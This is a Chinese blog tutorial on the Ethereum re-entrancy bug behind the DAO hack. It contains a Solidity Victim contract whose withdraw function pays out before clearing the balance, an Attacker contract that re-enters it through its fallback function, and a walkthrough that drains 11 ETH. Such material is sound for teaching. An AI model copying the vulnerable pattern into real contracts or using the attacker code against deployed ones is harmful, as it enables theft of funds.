以太坊重入攻击(Re-Entrancy)范例

本文介绍一下以太坊非常有名的重入攻击的范例。

鼎鼎大名的DAO攻击就是因为当时他们的智能合约中存在Re-Entrancy这个bug，ETC也是因为这个bug，硬分叉产生出来的链。下面来贴代码。
pragma solidity ^0.4.19; contract Victim {     mapping(address => uint) public
userBalannce;     uint public amount = 0;     function Victim() payable{}    
function withDraw(){         uint amount = userBalannce[msg.sender];        
if(amount > 0){             msg.sender.call.value(amount)();            
userBalannce[msg.sender] = 0;         }     }     function() payable{}    
function receiveEther() payable{         if(msg.value > 0){            
userBalannce[msg.sender] += msg.value;         }     }      function
showAccount() public returns (uint){         amount = this.balance;        
return this.balance;     } } contract Attacker{     uint public amount = 0;    
uint public test = 0;     function Attacker() payable{}     function() payable{
        test++;         Victim(msg.sender).withDraw();     }     function
showAccount() public returns (uint){         amount = this.balance;        
return this.balance;     }     function sendMoney(address addr){        
Victim(addr).receiveEther.value(1 ether)();     }     function reentry(address
addr){         Victim(addr).withDraw();     } }

上图中有两个智能合约，Attacker和Victim。其中Victim合约的withDraw函数有重入的bug（msg.sender.call.value(amount)();）这行。

当Attacker函数调用Victim合约的withDraw函数时（在reentry()函数），
Victim会执行msg.sender.call.value(amount)(); 但是接下来并不是执行userBalannce[msg.sender] =
0;
而是Attacker收到了Ether后，调用了回调函数，在回调函数中，又重新调用了Victim的withdraw。因此形成了一个循环，直至Victim中的Ether被清0.

以上便是Re-Entrancy的大致过程。

接下来执行以下。

1. 我们首先给Attacker账号1ETH的余额，给Victim账号10Eth的余额



2.
调用Attacker的sendMoney函数，让Attacker把自己的1Ether发给Victim。可以看到发送后Attacker的余额为0，而Victim已经有了11Ether。



3.
发动Re-Entrancy攻击，调用reentry函数。执行后发现Victim的11Eth全都到了Attacker的账户中，test的数量为11，说明fallback函数一共被调用了11次。

• « 上一篇：企业如何选择物联网卡以及流量套餐？
• » 下一篇：Windows 10自带虚拟机　Ｈyper-V 安装Windows 7 双系统上网设置方法